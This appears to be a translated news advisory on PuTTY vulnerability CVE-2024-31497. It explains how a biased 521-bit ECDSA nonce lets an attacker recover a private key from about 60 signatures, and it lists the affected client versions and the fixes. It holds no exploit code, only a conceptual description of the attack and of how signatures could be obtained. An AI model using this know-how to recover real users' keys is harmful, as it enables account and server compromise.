IN PuTTYa client for the SSH protocol that is popular on the Windows platform, identified dangerous vulnerability (CVE-2024-31497), allowing the user's private key to be recreated using the elliptic curve ECDSA algorithm NIST P-521 (ecdsa-sha2-nistp521). To select a private key, it is enough to analyze approximately 60 digital signatures generated by the problematic key.
The vulnerability appears starting from version PuTTY 0.68 and also affects products that include vulnerable versions of PuTTY, for example, FileZilla (3.24.1 – 3.66.5), WinSCP (5.9.5 – 6.3.2), TortoiseGit (2.4.0.2 – 2.15.0) and TortoiseSVN (1.10.0 – 1.14.6). The problem is fixed in updates PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 and TortoiseGit 2.15.0.1. After installing the update, users are advised to generate new keys and remove old public keys from their authorized_keys files.
Advertisement
The vulnerability is caused by the carelessness of the developers, who used an initialization vector (nonce) based on a 512-bit random sequence to generate a 521-bit key, probably believing that entropy of 512 bits would be enough and the remaining 9 bits are not of fundamental importance. As a result, in all private keys created in PuTTY using the ecdsa-sha2-nistp521 algorithm, the first 9 bits of the initialization vector always took zero values.
For ECDSA and DSA, the quality of the pseudorandom number generator and the complete coverage of the parameter used in calculating the modulus by random data is of fundamental importance, since the determination of even a few bits with information about the initialization vector is enough to carry out an attack to sequentially recover the entire private key. To successfully recover a key, it is enough to have a public key and analyze several dozen digital signatures generated using the problematic key for data known to the attacker. The attack comes down to solving the HNP problem (Hidden Number Problem).
The necessary digital signatures can be obtained, for example, when the user connects to the attacker's SSH server or to a Git server that uses SSH as a transport. The signatures required for the attack can also be found out if the key was used to verify arbitrary data, for example, git commits when using the Pageant SSH agent to redirect traffic to the developer’s host. Obtaining the data necessary to recover the key during a MITM attack is impossible, since signatures in SSH are not transmitted in clear text.
It is noted that similar use of incomplete initialization vectors was used in PuTTY for other types of elliptic curves, but for algorithms other than ECDSA P-521, the resulting information leaks are not enough to implement a working key recovery attack. ECDSA keys of other sizes and Ed25519 keys are not susceptible to attack.
Advertisement
Thanks for reading: